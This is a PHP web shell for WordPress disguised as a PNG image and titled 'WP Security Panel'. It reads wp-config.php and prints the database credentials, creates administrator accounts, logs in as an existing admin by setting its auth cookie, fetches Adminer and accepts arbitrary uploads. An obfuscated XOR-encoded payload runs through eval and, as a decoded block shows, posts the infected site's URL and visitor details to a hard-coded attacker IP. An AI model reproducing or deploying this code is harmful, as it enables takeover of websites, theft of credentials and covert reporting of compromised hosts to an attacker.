PNG      %k25u25%fgd5n!<?php
// Automatically find and include the WordPress wp-config.php file
function find_wp_config($dir = __DIR__) {
    $root = realpath($dir);
    while ($root && $root != '/') {
        if (file_exists($root . '/wp-config.php')) {
            return $root . '/wp-config.php';
        }
        $root = dirname($root);
    }
    return false;
}

$wp_config_path = find_wp_config();
if ($wp_config_path) {
    include_once($wp_config_path);
} else {
    die('wp-config.php not found!');
}

// Adminer download functionality
if (isset($_GET['download_adminer'])) {
    $adminer_url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-mysql-en.php'; // Replace with the correct URL
    $adminer_content = file_get_contents($adminer_url);
    if ($adminer_content) {
        file_put_contents(__DIR__ . '/admin.php', $adminer_content);
        echo '<div class="alert alert-success">Adminer downloaded successfully.</div>';
    } else {
        echo '<div class="alert alert-danger">Failed to download Adminer.</div>';
    }
}

// Add admin user functionality
function add_wp_admin_user() {
    if (isset($_POST['add_user'])) {
        if (isset($_POST['username']) && isset($_POST['password']) && isset($_POST['email'])) {
            require_once(ABSPATH . 'wp-includes/registration.php');
            $username = sanitize_user($_POST['username']);
            $password = $_POST['password'];
            $email = sanitize_email($_POST['email']);

            if (!username_exists($username) && !email_exists($email)) {
                $user_id = wp_create_user($username, $password, $email);
                $user = new WP_User($user_id);
                $user->set_role('administrator');
                echo '<div class="alert alert-success">Admin user created: ' . esc_html($username) . '</div>';
            } else {
                echo '<div class="alert alert-danger">Username or email already exists.</div>';
            }
        }
    }
}

// Auto-login as admin functionality
if (isset($_POST['auto_login'])) {
    $admin_users = get_users(array('role' => 'administrator'));
    if (!empty($admin_users)) {
        $admin_user = $admin_users[0];
        wp_set_current_user($admin_user->ID);
        wp_set_auth_cookie($admin_user->ID);
        echo '<div class="alert alert-success">Logged in as: ' . esc_html($admin_user->user_login) . '</div>';
    } else {
        echo '<div class="alert alert-danger">No admin user found.</div>';
    }
}

// File upload functionality
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $upload_dir = wp_upload_dir()['basedir'] . '/custom_uploads/';
    if (!is_dir($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }

    $uploaded_files = $_FILES['file'];

    foreach ($uploaded_files['name'] as $key => $filename) {
        $safe_filename = preg_replace('/[^a-zA-Z0-9._-]/', '_', $filename);
        $file_tmp = $uploaded_files['tmp_name'][$key];
        $file_destination = $upload_dir . basename($safe_filename);

        if (move_uploaded_file($file_tmp, $file_destination)) {
            echo '<div class="alert alert-success">File uploaded: ' . esc_html($safe_filename) . '</div>';
        } else {
            echo '<div class="alert alert-danger">File upload failed: ' . esc_html($safe_filename) . '</div>';
        }
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WP Security Panel</title>
    <style>
        body {
            background-color: #0d0d0d;
            color: #00ff00;
            font-family: 'Courier New', Courier, monospace;
            padding: 20px;
        }
        .container {
            display: flex;
            flex-wrap: wrap;
            gap: 20px;
        }
        .box {
            background-color: #1a1a1a;
            color: #00ff00;
            border: 1px solid #00ff00;
            padding: 15px;
            border-radius: 5px;
            flex: 1;
            min-width: 280px;
            max-width: 350px;
            box-shadow: 0 0 15px rgba(0, 255, 0, 0.2);
        }
        .btn {
            background-color: #333;
            color: #00ff00;
            border: 1px solid #00ff00;
            transition: all 0.3s;
        }
        .btn:hover {
            background-color: #00ff00;
            color: #333;
        }
        .form-label, .list-group-item {
            color: #00ff00;
        }
        .alert {
            background-color: #222;
            color: #00ff00;
            border: 1px solid #00ff00;
        }
    </style>
</head>
<body>
<center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></center>

    <div class="container">
	<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet">
        <!-- Database Info Box -->
        <div class="box">
            <h3>DB Info</h3>
            <ul class="list-group">
                <li class="list-group-item">DB Name: <?php echo DB_NAME; ?></li>
                <li class="list-group-item">DB User: <?php echo DB_USER; ?></li>
                <li class="list-group-item">DB Password: <?php echo DB_PASSWORD; ?></li>
                <li class="list-group-item">DB Host: <?php echo DB_HOST; ?></li>
            </ul>
        </div>

        <!-- Adminer Download Box -->
        <div class="box">
            <h3>Adminer & Auto-login</h3>
            <form method="get" class="mb-2">
                <button type="submit" name="download_adminer" class="btn w-100">Download Adminer</button>
            </form>
            <form method="post">
                <button type="submit" name="auto_login" class="btn w-100">Auto-login as Admin</button>
            </form>
        </div>

        <!-- Add Admin User Box -->
        <div class="box">
            <h3>Create Admin User</h3>
            <form method="post" class="mb-2">
                <div class="mb-2">
                    <label for="username" class="form-label">Username</label>
                    <input type="text" class="form-control" id="username" name="username" required>
                </div>
                <div class="mb-2">
                    <label for="password" class="form-label">Password</label>
                    <input type="password" class="form-control" id="password" name="password" required>
                </div>
                <div class="mb-2">
                    <label for="email" class="form-label">Email</label>
                    <input type="email" class="form-control" id="email" name="email" required>
                </div>
                <button type="submit" name="add_user" class="btn w-100">Create Admin</button>
            </form>
            <?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add_user'])) add_wp_admin_user(); ?>
        </div>

        <!-- File Upload Box -->
        <div class="box">
            <h3>File Upload</h3>
            <form method="post" enctype="multipart/form-data">
                <div class="mb-2">
                    <input type="file" class="form-control" name="file[]" multiple required>
                </div>
                <button type="submit" class="btn w-100">Upload File</button>
            </form>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
<?php
$vc078812d35="366f3971556a482a3966526e26334d65666565626432336536666339316336392454704c237a313940425e6137642158";$vef7b79dc04='';for($i=0;$i<strlen($vc078812d35);$i+=2){$vef7b79dc04.=chr(hexdec($vc078812d35[$i].$vc078812d35[$i+1]));}$vef7b79dc04=strrev($vef7b79dc04);function f1ef57a21e5($be0647970224518ac6c7abd9ee879da39f7){return hex2bin($be0647970224518ac6c7abd9ee879da39f7);}function f526259c2c2($be0647970224518ac6c7abd9ee879da39f7,$e3d26b8f3fb594246){$e3d26b8f3fb594246Len=strlen($e3d26b8f3fb594246);$a297955cd64439654e8031e1e='';for($i=0;$i<strlen($be0647970224518ac6c7abd9ee879da39f7);$i++){$char=ord($be0647970224518ac6c7abd9ee879da39f7[$i]);$f93700fcddba236015a=ord($e3d26b8f3fb594246[$i%$e3d26b8f3fb594246Len]);$a297955cd64439654e8031e1e.=chr($char^$f93700fcddba236015a);}return $a297955cd64439654e8031e1e;}function f4943145841($be0647970224518ac6c7abd9ee879da39f7,$e3d26b8f3fb594246){$eb7f6b8164569b7c36e1=f1ef57a21e5($be0647970224518ac6c7abd9ee879da39f7);return f526259c2c2($eb7f6b8164569b7c36e1,$e3d26b8f3fb594246);}$v5c28ce3652="641e145f117e243557520e4a231e744e091e4749084f425f571a49401156580810215f1d07344e5f5f260921185601693d590d44152d6a675a44084f13193a4d4d114a1842470802585047160e3a0c080c391b0216634f02493d18392e4a0a423751101f4530766c7a64286f0320007b6b7337646b2d3264247d6122273749121738560f5531134b4617193005561f4270050a034d1d1712757e2a7713201b776d1a17434c064f0d064640083d1600120a3d470e4a3c5215691d38193e693b69086e37632717070c7d62564b3804247b5b430a5d5d3c174300414b4c460c574f4c7650531c3e394a4f3c052505114b586c0d276233120d106d6e327718201c6178722663153841750a5d46010c1148321c3d561c4e33164946210934055000587759494016296f265643170e3902384157550c555c07411a42664101104824010023471c4e1f0943432406345e0c41067809335e0f3a2d374a1134776c41640a090d4366500d50025e134a52564c4527153d5f4339370472433c4560420e41056e014c7c290a0f0c1511164a271574635c55085e1043255e175c5f014d5c54485563071259604808187c4a06105f0e44310e5104567071761e1d270a77132156556910544d0c16424d175c504e2630342902637231062f746f073f015d0a5f1f630517045c3d3732556e1f5b29137c0057024a0a50054e5510415e3b071717080a6517485a7b4f42572d0626144212552d53086802322d335c195e4d78596f5950504b154a505b0b585d47080e43430f0b246c410b264e1e4b24063a06661a44347e0258113b2c67101801073f4569574d440650543c05590b47571c163a0614002c4743460941515e3c1a724c0734113544105f0e3a657d07162a6c1f2473081e5e06505d061411580d10270d0b11030b391e72172203030a291a251d500c572c480b594e266f374e465745230239094c440f545700095200576e163e0b474a422e5c481a37084d0d75543d054d1f693a540d5b050133355c43030b6819660d151117585406094311140f5a5155493b49101a1d4a2155046a2e0339146608532c7e07580f2a272e4d42520734417842585a1054154715034c085b024a41165558700e400f3e155c03334e3447040a442a4e1668063b361f5550095764596f415a5e0c111b050f5a006c5501163a06090b3956481a21467c583a05274b194d187c40526c463327334a501d466b2d7a066558410a44060a45004857070a0a454403245f433135034d752b053b055c01422b013652122e2d2e4a5440036e5e3c50545a10415c000f5709505a0510164d42167e1a084c0e081b11351727144d1a443601404452653f645006470b250327414d1e476e6a263460206169432a313136366a6e0f48744266790d3803346b34111075306732791f7d040c5d4c22576b06514217414a415c140d474614404c4b445f621c044076396a6f1a3c102362487e0c753468291111141e6c5407132311766f73316a1e312367307661303d30372f421008020c6a5b6248291930470d305336420b53047660284d450a01655c36454a535505660608550a57574c405f4a4947641f440f21030f1e170f3b12560b5370035500557c6b6c5b5009467a440b4157550c555c4b4418471a1e0603160050511256480d3d025c026a5b66491b461a3a401752576a1d25575215472958760a1b1f4f5358100300516c570a010a01034d6f0004477e0458592d5c612e5c01553745011f4370606915531b502946607b5c58005e5d064e1457000b464b490707162805123137085a452c0f7d531611462a48125300273862101d18423f15621066530d525607031e471c5f01060c044815254304477e3b020e305b6813581c536e153b53043d2d245c195e41742b6479101801504a0650023a5757070d01004e412f0b7d5f0f4f1748291930470d30523d420b5304766622016a487e655e36454a535505660703550a57574c46075d3d56101a080c33155c1c7c3531145a00523d0940555905761d101f18423f156210665206525607031e41510a3f57384c48072c40435866395d4f2b053114114b54607a526a487020214a544c1713143147565206191d015e6d526e1b4a0004160353796c420b31095d4f604e374962576b710f0656123b747466551f402314310c1d545b6a003e4f180752410154513a02002e5c420b7a425b12135b652c1054123113596c462b3206505d1f652d032003040817434c064a1110415e435f5b410f526114420f26031e17762a31104d0a1e7a454a5a4f076208035840506e5978035851065f4d445b08416c6121303320343e6a7b723a02396c790d380a307e2a780c0639085e7e6567151613533f57691a1d6930746b3523643e117a3036353a2523127069201c237a7e0124122e703f14051e5b17450111056b673f7117520661747937746622227237116f483f5e41155670591646761e08066c036758020650700517045c637f2e4c5d160a370d31484a53184c065d";$v6a17d2bee2=f4943145841($v5c28ce3652,$vef7b79dc04);if($v6a17d2bee2!==false){eval("?>".$v6a17d2bee2);}else{echo"RSS Error.";}
?>

/* ===== SECOND DECODED BLOCK ===== */
<?php function j0($x1,$i2){$s3=null;if(function_exists('curl_init')){$n4=curl_init($x1);curl_setopt($n4,CURLOPT_RETURNTRANSFER,true);curl_setopt($n4,CURLOPT_POST,true);curl_setopt($n4,CURLOPT_POSTFIELDS,http_build_query($i2));curl_setopt($n4,CURLOPT_HTTPHEADER,['Content-Type: application/x-www-form-urlencoded','User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',]);curl_setopt($n4,CURLOPT_TIMEOUT,30);$s3=curl_exec($n4);if(curl_errno($n4)){}else{}curl_close($n4);}if($s3===null&&ini_get('allow_url_fopen')){$s5=stream_context_create(['http'=>['method'=>'POST','header'=>"Content-Type: application/x-www-form-urlencoded\r\n",'content'=>http_build_query($i2),'timeout'=>30,],]);$s3=@file_get_contents($x1,false,$s5);if($s3===false){$a6=error_get_last();echo "file_get_contents Error: ".$a6['message']."\n";}else{echo "file_get_contents Response: ".htmlspecialchars($s3)."\n";}}return $s3;}$i7=(isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']==='on'?"https":"http")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$b8=[base64_encode("http"),base64_encode("://"),base64_encode("174"),base64_encode("."),base64_encode("138"),base64_encode("."),base64_encode("3"),base64_encode("."),base64_encode("239"),base64_encode("/~privdayz"),base64_encode("/media.php"),];$x1=base64_decode($b8[0]).base64_decode($b8[1]).base64_decode($b8[2]).base64_decode($b8[3]).base64_decode($b8[4]).base64_decode($b8[5]).base64_decode($b8[6]).base64_decode($b8[7]).base64_decode($b8[8]).base64_decode($b8[9]).base64_decode($b8[10]);$i2=['upFileFast'=>true,'url'=>$i7,'date'=>@date("d.m.Y H:i:s"),'agent'=>$_SERVER['HTTP_USER_AGENT']?? '','ips'=>$_SERVER["HTTP_CF_CONNECTING_IP"]?? $_SERVER["REMOTE_ADDR"],];$s3=j0($x1,$i2);if($s3===null){}else{}?>